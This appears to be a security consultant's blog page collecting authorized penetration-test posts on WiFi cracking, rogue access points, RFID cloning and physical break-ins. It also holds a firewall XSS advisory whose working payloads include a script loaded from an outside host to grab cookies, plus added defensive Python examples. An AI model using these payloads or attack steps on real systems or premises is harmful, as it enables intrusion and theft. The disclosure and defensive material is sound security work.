Hacking Wifi Networks for Fun and Profit
Written by Jeromie Jackson   
Monday, 09 August 2010 18:41

Wireless Insecurity

Wireless networks pose a significant security risk. To illustrate some of the attack points, I'll describe the penetration testing techniques and attacks I often use when assessing the wireless security posture of my clients.

Discovery

Profiling the wireless landscape is the first step. I document which wireless networks are in the area, the type of security each one uses, signal strengths, and network usage statistics. The Aircrack-NG suite is a great set of tools for this. Using the suite, I first put a wireless interface into monitor (promiscuous) mode (airmon-ng start wlan0), then begin discovery with Airodump-ng (airodump-ng -w filename mon0). An SSID that is not being broadcast is still identified as soon as any client exchanges traffic with it, because the monitoring interface sees every frame in the air.

Secondly, using Wireshark I can begin sniffing traffic sent through the air even without being connected to a network.

Wireshark

The three prominent types of networks you'll find are completely open, WEP secured, and WPA-PSK secured. With an open network you can generally just associate and will be handed a network address and the other details needed for basic networking.

Cracking WEP

With networks secured by WEP it is pretty easy to gain access quickly. Using the Aircrack-NG suite you begin capturing packets. The process requires accumulating enough packets for aircrack-ng to recover the key; how much traffic that takes varies. If packets are not being generated quickly, aireplay-ng can replay captured traffic to generate more. After a few minutes the attack will succeed and you will be on the network, ready to begin penetrating hosts on the wireless network or further back into the networks inside the organization. Here's a video showing the process.

Cracking WPA

WPA is a little more difficult to crack. There are two primary methods: rainbow tables and dictionary attacks. The Church of WiFi has compiled a list of the top 1000 most popular SSIDs and precomputed tables for them; because the WPA key derivation uses the SSID as a salt, a table is only valid for the SSID it was built for. If the network you are attacking uses one of these SSIDs you are in luck: with the rainbow tables you can quickly crack the password. If the SSID is not one of those included in the rainbow tables, a dictionary/brute-force password attack will be required. Either way, an initial WPA handshake must first be captured from the air. Using aireplay-ng to deauth a client forces the machine to automatically reconnect to the AP; once you record that reconnection you're ready to begin cracking. Here is a video demonstrating WPA cracking.
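Why a rainbow table is tied to one SSID, shown in code. This is an added example, not code from the original post: it derives the WPA-PSK pairwise master key with the public PBKDF2 construction from IEEE 802.11i, checks it against the standard's published test vector, and runs a few deployment checks a defender can apply before choosing an SSID and passphrase. The COMMON_SSIDS and SMALL_WORDLIST sets are constructed stand-ins (not the Church of WiFi list), and the 16-character minimum is a threshold chosen for this example.

```python
import hashlib

# Constructed examples of factory-default network names; the Church of WiFi's
# real top-1000 list is not reproduced here.
COMMON_SSIDS = {"linksys", "default", "NETGEAR", "dlink", "Wireless"}
# Constructed stand-in for a dictionary-attack wordlist.
SMALL_WORDLIST = {"password", "12345678", "qwertyuiop"}
# Example policy threshold, not a value from the standard.
MIN_PASSPHRASE_LEN = 16


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-PSK pairwise master key as specified in IEEE 802.11i:
    PBKDF2-HMAC-SHA1 over the passphrase, salted with the SSID,
    4096 iterations, 256-bit output.

    Each guess costs 4096 HMAC rounds, which is exactly why attackers
    precompute tables for SSIDs they expect to meet often."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrases are 8 to 63 ASCII characters")
    return hashlib.pbkdf2_hmac(
        "sha1", passphrase.encode("ascii"), ssid.encode("utf-8"), 4096, 32
    )


def pmk_depends_on_ssid(passphrase: str, ssid_a: str, ssid_b: str) -> bool:
    """True when the same passphrase yields different keys on two SSIDs,
    i.e. a table built for ssid_a is useless against ssid_b."""
    return derive_pmk(passphrase, ssid_a) != derive_pmk(passphrase, ssid_b)


def audit_psk_config(ssid: str, passphrase: str,
                     common_ssids=COMMON_SSIDS, wordlist=SMALL_WORDLIST) -> set:
    """Checks a defender can run before deploying a WPA-PSK network."""
    issues = set()
    if ssid in common_ssids:
        issues.add("ssid-in-common-list")      # precomputed tables exist for it
    if len(passphrase) < MIN_PASSPHRASE_LEN:
        issues.add("passphrase-too-short")     # cheap to guess offline
    if passphrase in wordlist:
        issues.add("passphrase-in-wordlist")   # falls to a dictionary attack
    return issues


if __name__ == "__main__":
    # IEEE 802.11i test vector: passphrase "password", SSID "IEEE"
    print(derive_pmk("password", "IEEE").hex())
    print(pmk_depends_on_ssid("password", "linksys", "CorpWiFi-7f3a"))
    print(audit_psk_config("linksys", "password"))
    print(audit_psk_config("CorpWiFi-7f3a", "correct horse battery staple xyz"))
```

Renaming the network to something unique removes the precomputation shortcut entirely; a long passphrase that is not in any wordlist is what closes the dictionary route.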

Gaining Access Without Compromising the Access Point

Who says you have to gain access to the existing network in order to compromise the environment? Another approach is to act as an AP and let the clients connect to you! Here are a couple of attack methods used in this scenario.

Scenario 1: Someone creates a fake AP posing as the organization's AP. When a client connects, the attacker's DHCP server hands the user an address and points them at the attacker's DNS. When the user tries to use the network they are instantly redirected to the attacker's website, which launches a plethora of attacks against the client with the intent of gaining system access. This is a very effective method, and certainly amusing at the same time. Karmasploit is the tool of choice, along with dnsspoof (part of the DSNIFF package) and a DHCP server of choice. Here's a video of how Karmasploit works. Here's a great article on how to pull it off.

Scenario 2: Someone walks into the environment and finds an open jack. Jumping on the network, they are served an IP address and are now on the LAN. From here the attacker again sets up a fake AP. When a user connects, everything looks normal. They begin logging in, using resources, and doing whatever it is they are hired to do, hopefully. During this entire time the attacker is collecting every credential the user presents, and potentially gaining insight into the business applications in use at the organization. Credentials, potentially sensitive information, and network access are all obtained.
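The discovery step and both rogue-AP scenarios come down to the same defensive question: does what is in the air match what the organization actually operates? As an added example (not from the original post or the Aircrack-NG project), the Python below parses the CSV that airodump-ng writes with -w, with the column layout assumed from that tool's output, and flags open and WEP networks, cloaked SSIDs, unknown BSSIDs advertising the corporate SSID (an evil twin), and clients associated to them. The survey data, the SSID "CorpWiFi" and the authorized BSSID list are constructed for the example.

```python
import csv
import io
from dataclasses import dataclass

# Constructed survey data modelled on the two tables airodump-ng writes to
# <prefix>-01.csv: access points, a blank line, then stations. Every address,
# timestamp and network name below is made up for this example.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:01, 2010-08-09 18:41:00, 2010-08-09 18:45:00,  6,  54, WPA2, CCMP, PSK, -42,  120,   0,   0.  0.  0.  0,   8, CorpWiFi,
00:11:22:33:44:02, 2010-08-09 18:41:10, 2010-08-09 18:45:00, 11,  54, WEP,  WEP,  OPN, -60,   80, 311,   0.  0.  0.  0,  11, Warehouse-1,
AA:BB:CC:DD:EE:FF, 2010-08-09 18:43:00, 2010-08-09 18:45:00,  6,  54, OPN,  ,  , -38,   40,   0,   0.  0.  0.  0,   8, CorpWiFi,
00:11:22:33:44:03, 2010-08-09 18:41:00, 2010-08-09 18:45:00,  1,  54, WPA2, CCMP, PSK, -71,   60,   0,   0.  0.  0.  0,   0, ,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
DE:AD:BE:EF:00:01, 2010-08-09 18:42:00, 2010-08-09 18:45:00, -50,   35, AA:BB:CC:DD:EE:FF, CorpWiFi
DE:AD:BE:EF:00:02, 2010-08-09 18:42:30, 2010-08-09 18:45:00, -55,   12, (not associated), HiddenNet
"""


@dataclass
class AccessPoint:
    bssid: str
    channel: int
    privacy: str   # OPN, WEP, WPA, WPA2 ... as airodump-ng prints it
    power: int
    ivs: int       # WEP initialisation vectors captured so far
    essid: str     # "" when the SSID is cloaked (not broadcast)


@dataclass
class Station:
    mac: str
    bssid: str     # "(not associated)" when the client is only probing
    probed: str


def parse_airodump_csv(text: str):
    """Split the two tables of an airodump-ng CSV export and parse each."""
    ap_text, _, station_text = text.strip().partition("\n\n")
    aps = [
        AccessPoint(
            bssid=row["BSSID"].strip().upper(),
            channel=int(row["channel"]),
            privacy=row["Privacy"].strip(),
            power=int(row["Power"]),
            ivs=int(row["# IV"]),
            essid=row["ESSID"].strip(),
        )
        for row in csv.DictReader(io.StringIO(ap_text), skipinitialspace=True)
    ]
    stations = [
        Station(
            mac=row["Station MAC"].strip().upper(),
            bssid=row["BSSID"].strip().upper(),
            probed=row["Probed ESSIDs"].strip(),
        )
        for row in csv.DictReader(io.StringIO(station_text), skipinitialspace=True)
    ]
    return aps, stations


def audit(aps, stations, org_essid, authorized_bssids):
    """Return (kind, address, detail) findings a wireless survey should raise."""
    authorized = {b.upper() for b in authorized_bssids}
    findings, rogue = [], set()
    for ap in aps:
        if ap.essid == org_essid and ap.bssid not in authorized:
            rogue.add(ap.bssid)
            findings.append(("EVIL_TWIN", ap.bssid,
                             f"unknown BSSID advertising {org_essid!r} on channel {ap.channel}"))
        if ap.privacy in ("OPN", ""):
            findings.append(("OPEN", ap.bssid, f"open network {ap.essid!r}"))
        elif ap.privacy.startswith("WEP"):
            findings.append(("WEP", ap.bssid, f"WEP network {ap.essid!r}, {ap.ivs} IVs seen"))
        if ap.essid == "":
            findings.append(("HIDDEN", ap.bssid, f"cloaked SSID on channel {ap.channel}"))
    for st in stations:
        if st.bssid in rogue:
            findings.append(("CLIENT_ON_ROGUE", st.mac, f"associated to rogue AP {st.bssid}"))
    return findings


if __name__ == "__main__":
    aps, stations = parse_airodump_csv(SAMPLE_CSV)
    for kind, addr, detail in audit(aps, stations, "CorpWiFi", ["00:11:22:33:44:01"]):
        print(f"{kind:16} {addr:18} {detail}")
```

Run it against a real export by replacing SAMPLE_CSV with the contents of the -w output file and the authorized list with the BSSIDs of the organization's own APs; the CLIENT_ON_ROGUE finding is the one that tells you a user has already joined the fake AP from Scenario 1 or 2.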

RFID Cloning- Wireless Access Control System Circumvention

While this article was mostly about hacking wireless networks, I had to include another topic near and dear to my heart that is also related to wireless access. Many access control systems use RFID technology to authenticate users to a building or door. While the simplicity is definitely user friendly, it is equally accessible to attackers. There are two common ways to attack these systems. First, using a card reader an attacker may simply read the card and copy the credentials to another card. Here's a video of a couple of buddies of mine using an RFID cloning device, along with a bunch of other cool physical security tools, to gain access to a building and steal pounds of diamonds for Jasons of Beverly Hills. The other method is skimming cards. By placing an overlay over the RFID reader it is possible for the attacker to grab the credentials without needing to be close to the card or the individual. The skimmer may use wireless to transmit the data to an attacker in the surrounding area, or may store the credentials until the attacker picks up the skimming device. Here's a video of the skimming technique.

Remediation- Protect Your Organization From Wireless Threats

In summary, it is very easy to mitigate the risks/threats described in this article-

ATM Hacking, GSM Exploits, and B-Sides- Oh My!
Written by Jeromie Jackson   
Friday, 06 August 2010 16:52

EFF Mohawk

Blackhat and Defcon are always a great time in Las Vegas for security practitioners and hackers alike. True to form, this year hit the mark again! Here's a rundown of some of the more interesting findings/talks during the conventions. The Electronic Frontier Foundation (EFF) is an organization focused on defending free speech, privacy, innovation, and consumer rights. I have seen their services in action and I highly endorse their activities. At Defcon there was a mohawk fundraiser for EFF, with quite a few mohawks roaming the halls during the event.

EFF Mohawk 2

ATM Hacking

A presentation was given showing security weaknesses in a couple of ATMs. In one of the hacks the presenter exploits the machine via the network; in the other he exposes a USB connection on the device that allows him to install malware. Here's a video of his presentation.

GSM Exploits

There were a couple of presentations about GSM exploitation. In one, Chris Paget discussed an IMSI (International Mobile Subscriber Identity) catcher he developed for about $1500.00 that allowed him to impersonate a cell tower. Phones would see the tower, which had a high signal strength, and connect to it, allowing interception of phone conversations. Here's a video of his presentation.

Drivesploit

Most of us heard a ton about the Aurora attack that happened not too long ago. A presentation at B-Sides discussed a new Metasploit module that will allow script kiddies to easily conduct drive-by attacks. Here is a copy of the presentation discussing the topic and tool.

Parties

Scooter_Wars

Technology Integration Group (TIG) threw a great party at the Hardwood Suite in the Palms. It was a long hard night, but I had to take one for the team and made it to bed slightly before sunrise.

Netwitness had a nice event at the top of the Pure Nightclub in Caesars Palace. Thanks go out to Scott Williams of Netwitness for the hook-up!

Rapid7 threw down another great party at the Playboy Suite in the Palms. If you know these guys they are VERY high energy. They make Nexpose, one of my preferred tools in my penetration testing and vulnerability assessment toolbag.

Ninja Party was off the hook: an invite-only party that creates some very cool badges for entry. A HUGE venue. Here's a 360 video of the event that night.

B-Sides is an event held alongside Defcon & Blackhat in Las Vegas. Lots of hardcore talks were held, as usual; however, the location was definitely kicked up this year. An estate not too far from the strip- the location rocked. Here's a link to the details along with the presentations. Here's a video of the event from the cabana in the middle of the pools.

A great event with friends, prospects, and customers. When you're ready to address security for your organization, you know who to call.

Securing Data Centers by Breaking Into Them
Written by Jeromie Jackson   
Monday, 28 December 2009 18:17

The locks on the building were of good quality.  They were 6-pin Schlage tumbler locks that incorporated one or more security pins.  Here's what the internals of a lock look like:

Lock

Theoretically any lock of this type is pickable.  Raking is the first technique we used, unsuccessfully.  We then tried single-picking the pins.  Over 30 minutes went by between the two methods.  While impatiently waiting I looked around, hunting for other avenues to our goal.

Lockpicking

While standing there, I noted the screws in the window were on our side of the door!  After unscrewing a screw we found the shank appeared to be long enough to go through the door.  Removing the other 9 screws, and a weather seal, out came the window, and we were on the 3rd floor.  From our reconnaissance earlier in the day we knew there were motion sensors running the length of the hallway.  Crawling over to the closest door, in order to evade the sensor, my partner began picking the interior door of the office.  After 20 minutes without progress, we decided he would make the LONG crawl down the hallway to where we had identified a poorly installed door that exposed the plunger.  Popping the plunger with a “Lucky-7” house number from Home Depot, the door was opened.  He came around to the other door closer to me, opened it, and I crawled my way over to the now opened interior door.

With no interior motion sensors we had free rein in the office.  We obtained several documents containing social security #'s and other confidential data.  Taking several tables that were available, we stacked them and I jumped over the drop ceiling into the datacenter- mission completed!  We took some video, gathered evidence, and left a note for our point of contact on a monitor in the datacenter.  Everything was put back the way it was originally, the window in the hallway door was re-installed, and we made our exit through the stairwell onto the main street- a clean getaway!

Our contact arrived at 7:30 the following morning, just as every other day.  He went to his desk, found nothing out of the ordinary, and worked through the morning.  Around noon he had to enter the datacenter for a task that needed physical access to one of the servers.  He looked over to the monitor and found our note: “Dear <Point of Contact>, Please call us to discuss your physical security.  Jeromie & Eric.”

I will be following up with several articles about circumventing physical security devices such as HID Proximity cards, some good info and sources for lock picking, creating lockpicking tools, and definitely more on my infosec penetration testing as well.  Be sure to follow me on Twitter!
Should you need any security assessment, regulatory compliance, web-application testing, social engineering, or red-team engagement, I would certainly appreciate the opportunity to earn your business!

Last Updated on Monday, 28 December 2009 18:20
Vulnerability in Palo Alto Networks Firewall
Written by Jeromie Jackson   
Tuesday, 11 May 2010 15:57

Palo Alto Networks XSS Vulnerability

I was playing around over the New Year, found a vulnerability in the Palo Alto Networks firewall, and worked with the vendor to get a patch in place.  Make sure you keep up with your maintenance upgrades!

Class: Cross-Site Scripting (XSS) Vulnerability

CVE: CVE-2010-0475

Remote: Yes

Local: Yes

Published: May 11, 2010 08:30AM

Timeline: Submission to MITRE: 1/18/2010

Vendor Contact: 2/18/2010

Vendor Response: 2/18/2010

Patch Available: 5/2010 Patched in maintenance releases (3.1.1 & 3.0.9)

Credit: Jeromie Jackson CISSP, CISM

COBIT & ITIL Certified

President- San Diego Open Web Application Security Project (OWASP)

Vice President- San Diego Information Audit & Control Association (ISACA)

SANS Mentor

LinkedIn: www.linkedin.com/in/securityassessment

Blog: www.JeromieJackson.com

Twitter: www.twitter.com/Security_Sifu

Validated Vulnerable:

Latest version as of December 31, 2009

Discussion:

A Stored Cross-Site Scripting (XSS) vulnerability was found within the Palo Alto interface. By crafting a URL that includes script code, it is possible to inject malicious data, redirect the user to a bogus replica of the real website, or perform other nefarious activity.

Exploit:

Single Line working- https://10.32.5.223:443/esp/editUser.esp?mode=edit&origusername=test&deviceC=localhost.localdomain&vsysC=localhost.localdomain%2Fvsys1&vsys=&profile=&cfgchange=&opasswd=&tpasswd=********&cpasswd=********&role=vsysadmin<SCRIPT>alert("0wn3d")</SCRIPT> &admin-role=%5Bobject+Object%5D&bSubmit=O

Working for redirect to load cookies into URL:

https://10.32.5.223:443/esp/editUser.esp?mode=edit&origusername=test&deviceC=localhost.localdomain&vsysC=localhost.localdomain%2Fvsys1&vsys=&profile=&cfgchange=&opasswd=&tpasswd=********&cpasswd=********&role=vsysadmin<SCRIPT/XSS src="/http://www.jeromiejackson.com/tryme.js"></SCRIPT>&admin-role=%5Bobject+Object%5D&bSubmit=O

Solution:

A patch will be required from the vendor. It is recommended that a routine to sanitize user input be implemented consistently throughout the application, so that other such occurrences are mitigated as well.
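As an added example of the sanitization the solution calls for (not code from Palo Alto Networks or from the advisory), the Python below parses the first proof-of-concept URL with the host replaced by a placeholder, shows a handler that reflects the role parameter verbatim, and beside it a hardened handler that validates role against an allow-list and HTML-encodes free-text fields on output. The allow-list, the field handling and the edit-user page itself are assumptions for a hypothetical application.

```python
import html
from urllib.parse import parse_qs, urlsplit

# The advisory's first proof-of-concept URL with the host replaced by a
# placeholder; the path and query are taken from the page.
POC_URL = ("https://firewall.example/esp/editUser.esp?mode=edit&origusername=test"
           "&role=vsysadmin<SCRIPT>alert(\"0wn3d\")</SCRIPT>"
           "&admin-role=%5Bobject+Object%5D&bSubmit=O")

# Allow-list for the role field of a hypothetical edit-user page. "vsysadmin"
# is the value seen in the advisory; the other entry is made up for this example.
ALLOWED_ROLES = {"vsysadmin", "readonly"}


def query_params(url: str) -> dict:
    """First value of every query parameter, blank values included."""
    parsed = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {key: values[0] for key, values in parsed.items()}


def encode_for_html(value: str) -> str:
    """Output encoding for an HTML attribute or text node."""
    return html.escape(value, quote=True)


def render_vulnerable(params: dict) -> str:
    """Reflects request parameters verbatim: markup in the URL becomes
    markup in the page, which is the defect the advisory describes."""
    return (f'<input name="origusername" value="{params.get("origusername", "")}">\n'
            f'<input name="role" value="{params.get("role", "")}">')


def render_hardened(params: dict) -> str:
    """Validate constrained fields against an allow-list and encode free-text
    fields on output; a bad role never reaches the page at all."""
    role = params.get("role", "")
    if role not in ALLOWED_ROLES:
        return '<p class="error">invalid role</p>'
    user = encode_for_html(params.get("origusername", ""))
    return (f'<input name="origusername" value="{user}">\n'
            f'<input name="role" value="{encode_for_html(role)}">')


if __name__ == "__main__":
    params = query_params(POC_URL)
    print("vulnerable:\n" + render_vulnerable(params))
    print("hardened:\n" + render_hardened(params))
    print(render_hardened({"role": "vsysadmin", "origusername": "<b>x</b>"}))
```

The two layers are deliberately separate: the allow-list catches anything that is not a legitimate role, and the output encoding protects fields such as the username that cannot be reduced to a fixed set of values.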

References:

OWASP Cross-Site Scripting (XSS) Attack Discussion

RSnake's Cross-Site Scripting (XSS) Attack Cheat Sheet

Last Updated on Tuesday, 11 May 2010 16:02
Red Team Physical Security Penetration Test
Written by Jeromie Jackson   
Wednesday, 16 December 2009 18:21

Our customer occupies the entire 3rd and 4th floors of a 4-story multi-tenant building. We took a variety of pictures and videos during this day, identifying and documenting the countermeasures and areas of weakness. One of my favorite new toys is a video camera, microphone and 3-megapixel camera that is housed in a pen.

Spy Pen

Not only does it produce a good picture and video, it was VERY cheap! I also walked several areas using my Blackberry, acting as though I was texting while walking, when in reality I was videotaping the environment. Primary take-aways were large gaps in the front doors, the lack of motion detectors on the 1st floor, access to the plunger on a poorly installed interior door, and identification of the datacenter. Monitoring the location, we noted the guards leave at 10PM. The cleaning crew appeared to set all of the alarms on their way out.

First Floor Entrance

We did not have all the equipment to clone HID cards, so our attack did not include cloning them; however, it is very easy. If you're interested I recommend checking out RFIdiot. Also, to see how vulnerable HID cards are, I recommend checking out this video from Paget that shows a simple cloning device. For a fairly expensive, long-range HID reading capability, check out this more elaborate long-range HID/RFID cloning setup.

At approximately 12:30AM we arrived on-site. The back door is protected by a HID proximity system. Shoving a wire hanger covered in a piece of paper through the door, we attempted, and were able, to trip the motion sensor. “CLICK,” went the pins keeping the door closed, but the doors did not open. The plunger/break-away bar was still keeping the door locked. We hit the street-side door and attempted to pick a Schlage lock for a minute or two. The amount of police traffic was too high- we left the door. Having severely compromised the organization during the day, my cohort was ready to call it a night. Having a “get out of jail free card,” and being up at 1AM, I wasn't so eager to give up. I went back home and bent up every round bar I had. I needed something I could shove through the door, turn, and then use to pull the plunger, opening the door.

Break-in-bars

I had that might fit through the door, and off I was for another hit on the building. I called my cohort and told him I would call him back in 30 minutes, successful or not. We needed a bar strong enough to push through the gap in the doors and then turn to pull the plunger closed. Eight minutes on the back door, and “POP,” I was in! The bent wire above with the needle-nose pliers was the tool that breached the door. I called my accomplice, “I'm in!!!,” I told him, and he was on his way to help complete the job.

Awaiting Backup

Making it into the first floor, thanks to poorly installed exterior doors, I called my buddy and called the troops in. After calling my wife, letting her know it was going to be a long night, I waited. All the doors in the hallway, except the stairwell, were locked. Not even the bathrooms were left unlocked. After approximately 15 minutes I heard someone yanking on the doors, then I heard radios going off. “It looks like someone tried to shim the door, there are fresh scratch marks,” I heard across the radio transmissions. Burrowing under the first-floor stairwell with my bent bar, coat hanger, and get-out-of-jail-free letter, I shivered for over 15 minutes. I couldn't call my buddy as there wasn't service under the stairwell. After approximately 15 minutes the noise had ended- the police had left, as nothing was tripped in the facility. We had entered the building and had 5 hours until security would be returning the following morning. My next blog will document getting into the interior offices and compromising the datacenter. Make sure to follow me on Twitter!

Last Updated on Wednesday, 16 December 2009 18:23